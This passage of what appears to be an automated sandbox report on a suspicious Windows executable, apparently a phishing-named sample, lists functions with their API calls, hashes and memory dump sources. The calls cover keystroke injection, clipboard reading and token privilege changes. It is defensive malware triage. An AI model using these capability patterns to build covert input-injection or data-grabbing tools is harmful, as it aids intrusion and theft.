                                          • Associated: 00000000.00000002.1690016446.0000000000EAF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1690029719.0000000000EB8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_df0000_20-EM-00- PI-INQ-3001.jbxd
                                          Similarity
                                          • API ID: LongNamePath_memmove
                                          • String ID:
                                          • API String ID: 2514874351-0
                                          • Opcode ID: 4ab42de76f67a45f9a8bcea1aff8687cbbbb45a6e7cdbc784483df10a4fa3847
                                          • Instruction ID: 3ef53e9b056d84c6ff7a32073dc5b7edb3b218fc0ab28c53d64f181b1476d6cf
                                          • Opcode Fuzzy Hash: 4ab42de76f67a45f9a8bcea1aff8687cbbbb45a6e7cdbc784483df10a4fa3847
                                          • Instruction Fuzzy Hash: 18E0CD3690422C9BC720D658AC05FFA77EDDF88790F0541F5FD0CD7215D9609D8186A0
                                          Function 00E59129 Relevance: 1.5, APIs: 1, Instructions: 22COMMON
                                          Download Yara Rule
                                          APIs
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.1689947115.0000000000DF1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00DF0000, based on PE: true
                                          • Associated: 00000000.00000002.1689935721.0000000000DF0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1689984425.0000000000E7F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1689984425.0000000000EA5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1690016446.0000000000EAF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1690029719.0000000000EB8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_df0000_20-EM-00- PI-INQ-3001.jbxd
                                          Similarity
                                          • API ID: __fread_nolock
                                          • String ID:
                                          • API String ID: 2638373210-0
                                          • Opcode ID: 7603a7e23398706fbe611478ecf9e3358d47b441acc83f726054c373298f7434
                                          • Instruction ID: bb1a5d64805a660fe503eb86dfe6b7bb412761a21770fcef9bcc73db0cde6cf2
                                          • Opcode Fuzzy Hash: 7603a7e23398706fbe611478ecf9e3358d47b441acc83f726054c373298f7434
                                          • Instruction Fuzzy Hash: 07E092B1104B409FD7388A24D8507E373E0AB06319F00081CF69A93342EB6278458B59
                                          Function 00E1548B Relevance: 1.5, APIs: 1, Instructions: 9COMMON
                                          Download Yara Rule
                                          APIs
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.1689947115.0000000000DF1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00DF0000, based on PE: true
                                          • Associated: 00000000.00000002.1689935721.0000000000DF0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1689984425.0000000000E7F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1689984425.0000000000EA5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1690016446.0000000000EAF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1690029719.0000000000EB8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_df0000_20-EM-00- PI-INQ-3001.jbxd
                                          Similarity
                                          • API ID: __wfsopen
                                          • String ID:
                                          • API String ID: 197181222-0
                                          • Opcode ID: 6ddf6e1ab81d7b85eaff3423c11cf18e9f26fa56f97d638f5b10e7f164e3c6f3
                                          • Instruction ID: b42fac6b638b4e8f4446c8f423b4292d2fd01938fb53ed1c1fa23f053d2368cf
                                          • Opcode Fuzzy Hash: 6ddf6e1ab81d7b85eaff3423c11cf18e9f26fa56f97d638f5b10e7f164e3c6f3
                                          • Instruction Fuzzy Hash: C8B0927684020CB7DE012E82EC02A993B599B80678F808020FB1D28162A673A6A09689
                                          Function 00E3220E Relevance: 1.5, APIs: 1, Instructions: 7COMMON
                                          Download Yara Rule
                                          APIs
                                          • GetTempPathW.KERNELBASE(00000104,?), ref: 00E3221A
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.1689947115.0000000000DF1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00DF0000, based on PE: true
                                          • Associated: 00000000.00000002.1689935721.0000000000DF0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1689984425.0000000000E7F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1689984425.0000000000EA5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1690016446.0000000000EAF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1690029719.0000000000EB8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_df0000_20-EM-00- PI-INQ-3001.jbxd
                                          Similarity
                                          • API ID: PathTemp
                                          • String ID:
                                          • API String ID: 2920410445-0
                                          • Opcode ID: 5c21af349769ba64d16079ec47d2319b28b4e52abce5bacbe9940f4081d17de8
                                          • Instruction ID: 6cfd8c8d1a44042d696cfc170079f443a0e512df4f7dba6a4b3d24ed4b7d1469
                                          • Opcode Fuzzy Hash: 5c21af349769ba64d16079ec47d2319b28b4e52abce5bacbe9940f4081d17de8
                                          • Instruction Fuzzy Hash: CCC04C70454019DFEB15A750DC99AF8767CAF00701F1410D5B145A10A1D5B05BC5CE11
                                          Function 00E10E48 Relevance: 1.3, APIs: 1, Instructions: 94memoryCOMMON
                                          Download Yara Rule
                                          APIs
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.1689947115.0000000000DF1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00DF0000, based on PE: true
                                          • Associated: 00000000.00000002.1689935721.0000000000DF0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1689984425.0000000000E7F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1689984425.0000000000EA5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1690016446.0000000000EAF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1690029719.0000000000EB8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_df0000_20-EM-00- PI-INQ-3001.jbxd
                                          Similarity
                                          • API ID: AllocVirtual
                                          • String ID:
                                          • API String ID: 4275171209-0
                                          • Opcode ID: 160be14eaa7db79452b6aeb530136e2f2731e3e0b6e758b09a27e7bca35b483d
                                          • Instruction ID: 494bb14852c776536c45d204932ac4b6fccdbb131e471ae370bf6ba0f2fd0a9e
                                          • Opcode Fuzzy Hash: 160be14eaa7db79452b6aeb530136e2f2731e3e0b6e758b09a27e7bca35b483d
                                          • Instruction Fuzzy Hash: DA31F670A00105DFCB18DF59C4809A9F7B6FF59304B64AAA5E40AEB651D7B1EDC1CBC0
                                          Function 00FF22A0 Relevance: 1.3, APIs: 1, Instructions: 18sleepCOMMON
                                          Download Yara Rule
                                          APIs
                                          • Sleep.KERNELBASE(000001F4), ref: 00FF22B1
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.1690070618.0000000000FF0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00FF0000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_ff0000_20-EM-00- PI-INQ-3001.jbxd
                                          Similarity
                                          • API ID: Sleep
                                          • String ID:
                                          • API String ID: 3472027048-0
                                          • Opcode ID: 368835ae2f5fba710e6c01549c2017e46dd928bc4d187f44ede00cceab054826
                                          • Instruction ID: 2fb22f8e250dc9323bcfcecb8e28a99395d3581bb5d1966d9268163aaf9a8d79
                                          • Opcode Fuzzy Hash: 368835ae2f5fba710e6c01549c2017e46dd928bc4d187f44ede00cceab054826
                                          • Instruction Fuzzy Hash: 20E0E67498110EDFDB00EFB8D5496AE7FB4EF04311F100161FD01D2280D6309D509A72

                                          Non-executed Functions

                                          Function 00E7CDAC Relevance: 75.9, APIs: 40, Strings: 3, Instructions: 637windowkeyboardCOMMON
                                          Download Yara Rule
                                          APIs
                                            • Part of subcall function 00DF2612: GetWindowLongW.USER32(?,000000EB), ref: 00DF2623
                                          • DefDlgProcW.USER32(?,0000004E,?,?,?,?,?,?), ref: 00E7CE50
                                          • SendMessageW.USER32(?,0000130B,00000000,00000000), ref: 00E7CE91
                                          • GetWindowLongW.USER32(FFFFFDD9,000000F0), ref: 00E7CED6
                                          • SendMessageW.USER32(?,0000110A,00000009,00000000), ref: 00E7CF00
                                          • SendMessageW.USER32 ref: 00E7CF29
                                          • _wcsncpy.LIBCMT ref: 00E7CFA1
                                          • GetKeyState.USER32(00000011), ref: 00E7CFC2
                                          • GetKeyState.USER32(00000009), ref: 00E7CFCF
                                          • SendMessageW.USER32(?,0000130B,00000000,00000000), ref: 00E7CFE5
                                          • GetKeyState.USER32(00000010), ref: 00E7CFEF
                                          • SendMessageW.USER32(?,0000110A,00000009,00000000), ref: 00E7D018
                                          • SendMessageW.USER32 ref: 00E7D03F
                                          • SendMessageW.USER32(?,00001030,?,00E7B602), ref: 00E7D145
                                          • ImageList_SetDragCursorImage.COMCTL32(00000000,00000000,00000000,?,?,?), ref: 00E7D15B
                                          • ImageList_BeginDrag.COMCTL32(00000000,000000F8,000000F0), ref: 00E7D16E
                                          • SetCapture.USER32(?), ref: 00E7D177
                                          • ClientToScreen.USER32(?,?), ref: 00E7D1DC
                                          • ImageList_DragEnter.COMCTL32(00000000,?,?), ref: 00E7D1E9
                                          • InvalidateRect.USER32(?,00000000,00000001,?,?,?), ref: 00E7D203
                                          • ReleaseCapture.USER32 ref: 00E7D20E
                                          • GetCursorPos.USER32(?), ref: 00E7D248
                                          • ScreenToClient.USER32(?,?), ref: 00E7D255
                                          • SendMessageW.USER32(?,00001012,00000000,?), ref: 00E7D2B1
                                          • SendMessageW.USER32 ref: 00E7D2DF
                                          • SendMessageW.USER32(?,00001111,00000000,?), ref: 00E7D31C
                                          • SendMessageW.USER32 ref: 00E7D34B
                                          • SendMessageW.USER32(?,0000110B,00000009,00000000), ref: 00E7D36C
                                          • SendMessageW.USER32(?,0000110B,00000009,?), ref: 00E7D37B
                                          • GetCursorPos.USER32(?), ref: 00E7D39B
                                          • ScreenToClient.USER32(?,?), ref: 00E7D3A8
                                          • GetParent.USER32(?), ref: 00E7D3C8
                                          • SendMessageW.USER32(?,00001012,00000000,?), ref: 00E7D431
                                          • SendMessageW.USER32 ref: 00E7D462
                                          • ClientToScreen.USER32(?,?), ref: 00E7D4C0
                                          • TrackPopupMenuEx.USER32(?,00000000,?,?,?,00000000), ref: 00E7D4F0
                                          • SendMessageW.USER32(?,00001111,00000000,?), ref: 00E7D51A
                                          • SendMessageW.USER32 ref: 00E7D53D
                                          • ClientToScreen.USER32(?,?), ref: 00E7D58F
                                          • TrackPopupMenuEx.USER32(?,00000080,?,?,?,00000000), ref: 00E7D5C3
                                            • Part of subcall function 00DF25DB: GetWindowLongW.USER32(?,000000EB), ref: 00DF25EC
                                          • GetWindowLongW.USER32(?,000000F0), ref: 00E7D65F
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.1689947115.0000000000DF1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00DF0000, based on PE: true
                                          • Associated: 00000000.00000002.1689935721.0000000000DF0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1689984425.0000000000E7F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1689984425.0000000000EA5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1690016446.0000000000EAF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1690029719.0000000000EB8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_df0000_20-EM-00- PI-INQ-3001.jbxd
                                          Similarity
                                          • API ID: MessageSend$ClientScreen$ImageLongWindow$CursorDragList_State$CaptureMenuPopupTrack$BeginEnterInvalidateParentProcRectRelease_wcsncpy
                                          • String ID: @GUI_DRAGID$F$pr
                                          • API String ID: 3977979337-1436871235
                                          • Opcode ID: 17ab545e86b88f7d9d9d9cefdbe6646cbe2d1f9220328d04015e743590ea33af
                                          • Instruction ID: a09561424ad4cbbdda7abbb8913140548d7eee871dcfd5d41584d1695b7f7773
                                          • Opcode Fuzzy Hash: 17ab545e86b88f7d9d9d9cefdbe6646cbe2d1f9220328d04015e743590ea33af
                                          • Instruction Fuzzy Hash: 8842A130204241AFD725CF68CC44FAABBE9FF48718F24952DF699A72A0C731D955CB92
                                          Function 00E7804A Relevance: 60.1, APIs: 33, Strings: 1, Instructions: 571windowCOMMON
                                          Download Yara Rule
                                          APIs
                                          • SendMessageW.USER32(?,00000400,00000000,00000000), ref: 00E7873F
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.1689947115.0000000000DF1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00DF0000, based on PE: true
                                          • Associated: 00000000.00000002.1689935721.0000000000DF0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1689984425.0000000000E7F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1689984425.0000000000EA5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1690016446.0000000000EAF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1690029719.0000000000EB8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_df0000_20-EM-00- PI-INQ-3001.jbxd
                                          Similarity
                                          • API ID: MessageSend
                                          • String ID: %d/%02d/%02d
                                          • API String ID: 3850602802-328681919
                                          • Opcode ID: 5a5f8a265a92fe32e30f79ffa6a7fc92c869e9fef7cf3749f83559e200bd89f8
                                          • Instruction ID: 411d5017ecb72bf95b2e9557d9a08d6bffd056b7b02c997c8df98420c3d17040
                                          • Opcode Fuzzy Hash: 5a5f8a265a92fe32e30f79ffa6a7fc92c869e9fef7cf3749f83559e200bd89f8
                                          • Instruction Fuzzy Hash: D112E171540204AFEB248F65CD4DFAA7BF4EF59714F20A129F91AFA2A1DF708981CB50
                                          Function 00E0710E Relevance: 52.3, APIs: 19, Strings: 8, Instructions: 5093COMMON
                                          Download Yara Rule
                                          APIs
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.1689947115.0000000000DF1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00DF0000, based on PE: true
                                          • Associated: 00000000.00000002.1689935721.0000000000DF0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1689984425.0000000000E7F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1689984425.0000000000EA5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1690016446.0000000000EAF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1690029719.0000000000EB8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_df0000_20-EM-00- PI-INQ-3001.jbxd
                                          Similarity
                                          • API ID: _memmove$_memset
                                          • String ID: 0w$DEFINE$Oa$Q\E$[:<:]]$[:>:]]$\b(?<=\w)$\b(?=\w)
                                          • API String ID: 1357608183-332139107
                                          • Opcode ID: e5b5f0bb159db7735a4f74973a632084d1072757d6f9e1e72bb9699d2103f406
                                          • Instruction ID: c321d4dc877ddfb2b779fab81fa0c294009ac851c2a8da1a381c957d55fca7df
                                          • Opcode Fuzzy Hash: e5b5f0bb159db7735a4f74973a632084d1072757d6f9e1e72bb9699d2103f406
                                          • Instruction Fuzzy Hash: 8F93A171E00215DBDB24CFA8D881BEDB7B1FF48314F65916AE955BB280E770AE81CB50
                                          Function 00DF4A35 Relevance: 43.9, APIs: 24, Strings: 1, Instructions: 131keyboardthreadwindowCOMMON
                                          Download Yara Rule
                                          APIs
                                          • GetForegroundWindow.USER32(00000000,?), ref: 00DF4A3D
                                          • FindWindowW.USER32(Shell_TrayWnd,00000000), ref: 00E2DA8E
                                          • IsIconic.USER32(?), ref: 00E2DA97
                                          • ShowWindow.USER32(?,00000009), ref: 00E2DAA4
                                          • SetForegroundWindow.USER32(?), ref: 00E2DAAE
                                          • GetWindowThreadProcessId.USER32(00000000,00000000), ref: 00E2DAC4
                                          • GetCurrentThreadId.KERNEL32 ref: 00E2DACB
                                          • GetWindowThreadProcessId.USER32(?,00000000), ref: 00E2DAD7
                                          • AttachThreadInput.USER32(?,00000000,00000001), ref: 00E2DAE8
                                          • AttachThreadInput.USER32(?,00000000,00000001), ref: 00E2DAF0
                                          • AttachThreadInput.USER32(00000000,?,00000001), ref: 00E2DAF8
                                          • SetForegroundWindow.USER32(?), ref: 00E2DAFB
                                          • MapVirtualKeyW.USER32(00000012,00000000), ref: 00E2DB10
                                          • keybd_event.USER32(00000012,00000000), ref: 00E2DB1B
                                          • MapVirtualKeyW.USER32(00000012,00000000), ref: 00E2DB25
                                          • keybd_event.USER32(00000012,00000000), ref: 00E2DB2A
                                          • MapVirtualKeyW.USER32(00000012,00000000), ref: 00E2DB33
                                          • keybd_event.USER32(00000012,00000000), ref: 00E2DB38
                                          • MapVirtualKeyW.USER32(00000012,00000000), ref: 00E2DB42
                                          • keybd_event.USER32(00000012,00000000), ref: 00E2DB47
                                          • SetForegroundWindow.USER32(?), ref: 00E2DB4A
                                          • AttachThreadInput.USER32(?,?,00000000), ref: 00E2DB71
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.1689947115.0000000000DF1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00DF0000, based on PE: true
                                          • Associated: 00000000.00000002.1689935721.0000000000DF0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1689984425.0000000000E7F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1689984425.0000000000EA5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1690016446.0000000000EAF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1690029719.0000000000EB8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_df0000_20-EM-00- PI-INQ-3001.jbxd
                                          Similarity
                                          • API ID: Window$Thread$AttachForegroundInputVirtualkeybd_event$Process$CurrentFindIconicShow
                                          • String ID: Shell_TrayWnd
                                          • API String ID: 4125248594-2988720461
                                          • Opcode ID: 49e0ac39da35270ecb8d183a9bca984791bf9364699c3e3f87e643137ef300b0
                                          • Instruction ID: 6ef945d2b50617a5b103d1b1314891132fee5e74483479d851a4458c77bc6104
                                          • Opcode Fuzzy Hash: 49e0ac39da35270ecb8d183a9bca984791bf9364699c3e3f87e643137ef300b0
                                          • Instruction Fuzzy Hash: 76313271A44318BFEB21AFA29C49FBF7F6CEB44B50F114025FA05FA1D1D6B05D50AAA0
                                          Function 00E48858 Relevance: 35.2, APIs: 17, Strings: 3, Instructions: 224COMMON
                                          Download Yara Rule
                                          APIs
                                            • Part of subcall function 00E48CC3: LookupPrivilegeValueW.ADVAPI32(00000000,00000000,00000004), ref: 00E48D0D
                                            • Part of subcall function 00E48CC3: AdjustTokenPrivileges.ADVAPI32(?,00000000,00000000,?,00000000,?), ref: 00E48D3A
                                            • Part of subcall function 00E48CC3: GetLastError.KERNEL32 ref: 00E48D47
                                          • _memset.LIBCMT ref: 00E4889B
                                          • DuplicateTokenEx.ADVAPI32(?,00000000,00000000,00000002,00000001,?,?,?,?,00000001,?,?), ref: 00E488ED
                                          • CloseHandle.KERNEL32(?), ref: 00E488FE
                                          • OpenWindowStationW.USER32(winsta0,00000000,00060000), ref: 00E48915
                                          • GetProcessWindowStation.USER32 ref: 00E4892E
                                          • SetProcessWindowStation.USER32(00000000), ref: 00E48938
                                          • OpenDesktopW.USER32(default,00000000,00000000,00060081), ref: 00E48952
                                            • Part of subcall function 00E48713: AdjustTokenPrivileges.ADVAPI32(?,00000000,?,00000000,00000000,00000000,?,00E48851), ref: 00E48728
                                            • Part of subcall function 00E48713: CloseHandle.KERNEL32(?,?,00E48851), ref: 00E4873A
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.1689947115.0000000000DF1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00DF0000, based on PE: true
                                          • Associated: 00000000.00000002.1689935721.0000000000DF0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1689984425.0000000000E7F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1689984425.0000000000EA5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1690016446.0000000000EAF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1690029719.0000000000EB8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_df0000_20-EM-00- PI-INQ-3001.jbxd
                                          Similarity
                                          • API ID: StationTokenWindow$AdjustCloseHandleOpenPrivilegesProcess$DesktopDuplicateErrorLastLookupPrivilegeValue_memset
                                          • String ID: $default$winsta0
                                          • API String ID: 2063423040-1027155976
                                          • Opcode ID: ec97db828ff1137db5ffda39c18b08a22855defd15add2d5a719bb2c6e04bf4f
                                          • Instruction ID: bfc5fdd681e093fc047ce1c83f9d6aeecb530952a40889b9a860b68aba53ed47
                                          • Opcode Fuzzy Hash: ec97db828ff1137db5ffda39c18b08a22855defd15add2d5a719bb2c6e04bf4f
                                          • Instruction Fuzzy Hash: 13818E71C00209AFDF11DFA4ED45AEE7BB8EF08348F08512AF924B6161DB718E54EB61
                                          Function 00E6425A Relevance: 30.2, APIs: 20, Instructions: 167clipboardCOMMON
                                          Download Yara Rule
                                          APIs
                                          • OpenClipboard.USER32(00E7F910), ref: 00E64284
                                          • IsClipboardFormatAvailable.USER32(0000000D), ref: 00E64292
                                          • GetClipboardData.USER32(0000000D), ref: 00E6429A
                                          • CloseClipboard.USER32 ref: 00E642A6
                                          • GlobalLock.KERNEL32(00000000), ref: 00E642C2
                                          • CloseClipboard.USER32 ref: 00E642CC
                                          • GlobalUnlock.KERNEL32(00000000,00000000), ref: 00E642E1
                                          • IsClipboardFormatAvailable.USER32(00000001), ref: 00E642EE
                                          • GetClipboardData.USER32(00000001), ref: 00E642F6
                                          • GlobalLock.KERNEL32(00000000), ref: 00E64303
                                          • GlobalUnlock.KERNEL32(00000000,00000000,?), ref: 00E64337
                                          • CloseClipboard.USER32 ref: 00E64447
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.1689947115.0000000000DF1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00DF0000, based on PE: true
                                          • Associated: 00000000.00000002.1689935721.0000000000DF0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1689984425.0000000000E7F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1689984425.0000000000EA5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1690016446.0000000000EAF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1690029719.0000000000EB8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_df0000_20-EM-00- PI-INQ-3001.jbxd
                                          Similarity
                                          • API ID: Clipboard$Global$Close$AvailableDataFormatLockUnlock$Open
                                          • String ID:
                                          • API String ID: 3222323430-0
                                          • Opcode ID: bd8e28e1c28d30ca0594d2fb594ff506bf6ddf6fb7197ca81304d95a2bbffb96
                                          • Instruction ID: 2ea7ea9529ffa0ed9440a5bf51738dc60eb757314686c000bceebef5ba70ca34
                                          • Opcode Fuzzy Hash: bd8e28e1c28d30ca0594d2fb594ff506bf6ddf6fb7197ca81304d95a2bbffb96
                                          • Instruction Fuzzy Hash: 2751BF71244206AFD310EF61EC96FBE77A8EB84B44F105529F55AF21E1DF30D9488B62
                                          Function 00E5C9C7 Relevance: 28.3, APIs: 13, Strings: 3, Instructions: 280timefileCOMMON
                                          Download Yara Rule
                                          APIs
                                          • FindFirstFileW.KERNEL32(?,?), ref: 00E5C9F8
                                          • FindClose.KERNEL32(00000000), ref: 00E5CA4C
                                          • FileTimeToLocalFileTime.KERNEL32(?,?), ref: 00E5CA71
                                          • FileTimeToLocalFileTime.KERNEL32(?,?), ref: 00E5CA88
                                          • FileTimeToSystemTime.KERNEL32(?,?), ref: 00E5CAAF
                                          • __swprintf.LIBCMT ref: 00E5CAFB
                                          • __swprintf.LIBCMT ref: 00E5CB3E
                                            • Part of subcall function 00DF7F41: _memmove.LIBCMT ref: 00DF7F82
                                          • __swprintf.LIBCMT ref: 00E5CB92
                                            • Part of subcall function 00E138D8: __woutput_l.LIBCMT ref: 00E13931
                                          • __swprintf.LIBCMT ref: 00E5CBE0
                                            • Part of subcall function 00E138D8: __flsbuf.LIBCMT ref: 00E13953
                                            • Part of subcall function 00E138D8: __flsbuf.LIBCMT ref: 00E1396B
                                          • __swprintf.LIBCMT ref: 00E5CC2F
                                          • __swprintf.LIBCMT ref: 00E5CC7E
                                          • __swprintf.LIBCMT ref: 00E5CCCD
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.1689947115.0000000000DF1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00DF0000, based on PE: true
                                          • Associated: 00000000.00000002.1689935721.0000000000DF0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1689984425.0000000000E7F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1689984425.0000000000EA5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1690016446.0000000000EAF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1690029719.0000000000EB8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_df0000_20-EM-00- PI-INQ-3001.jbxd
                                          Similarity
                                          • API ID: __swprintf$FileTime$FindLocal__flsbuf$CloseFirstSystem__woutput_l_memmove
                                          • String ID: %02d$%4d$%4d%02d%02d%02d%02d%02d
                                          • API String ID: 3953360268-2428617273
                                          • Opcode ID: 2aa4c2bf0c12721b5d3c1302eec0dae0403b520fb5a587ef47f6b046695bb371
                                          • Instruction ID: d6b7c53db75f6b4835fc67d8931dc5ecddff20ce731e22f9b82df475b521a221
                                          • Opcode Fuzzy Hash: 2aa4c2bf0c12721b5d3c1302eec0dae0403b520fb5a587ef47f6b046695bb371
                                          • Instruction Fuzzy Hash: ECA13EB1508308AFC704EB64D895EBFB7ECEF94705F404929F686D6191EA34DA48CB72
                                          Function 00E5F200 Relevance: 28.1, APIs: 15, Strings: 1, Instructions: 119fileCOMMON
                                          Download Yara Rule
                                          APIs
                                          • FindFirstFileW.KERNEL32(?,?,74DE8FB0,?,00000000), ref: 00E5F221
                                          • _wcscmp.LIBCMT ref: 00E5F236
                                          • _wcscmp.LIBCMT ref: 00E5F24D
                                          • GetFileAttributesW.KERNEL32(?), ref: 00E5F25F
                                          • SetFileAttributesW.KERNEL32(?,?), ref: 00E5F279
                                          • FindNextFileW.KERNEL32(00000000,?), ref: 00E5F291
                                          • FindClose.KERNEL32(00000000), ref: 00E5F29C
                                          • FindFirstFileW.KERNEL32(*.*,?), ref: 00E5F2B8
                                          • _wcscmp.LIBCMT ref: 00E5F2DF
                                          • _wcscmp.LIBCMT ref: 00E5F2F6
                                          • SetCurrentDirectoryW.KERNEL32(?), ref: 00E5F308
                                          • SetCurrentDirectoryW.KERNEL32(00EAA5A0), ref: 00E5F326
                                          • FindNextFileW.KERNEL32(00000000,00000010), ref: 00E5F330
                                          • FindClose.KERNEL32(00000000), ref: 00E5F33D
                                          • FindClose.KERNEL32(00000000), ref: 00E5F34F
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.1689947115.0000000000DF1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00DF0000, based on PE: true
                                          • Associated: 00000000.00000002.1689935721.0000000000DF0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1689984425.0000000000E7F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1689984425.0000000000EA5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1690016446.0000000000EAF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1690029719.0000000000EB8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_df0000_20-EM-00- PI-INQ-3001.jbxd
                                          Similarity
                                          • API ID: Find$File$_wcscmp$Close$AttributesCurrentDirectoryFirstNext
                                          • String ID: *.*
                                          • API String ID: 1803514871-438819550
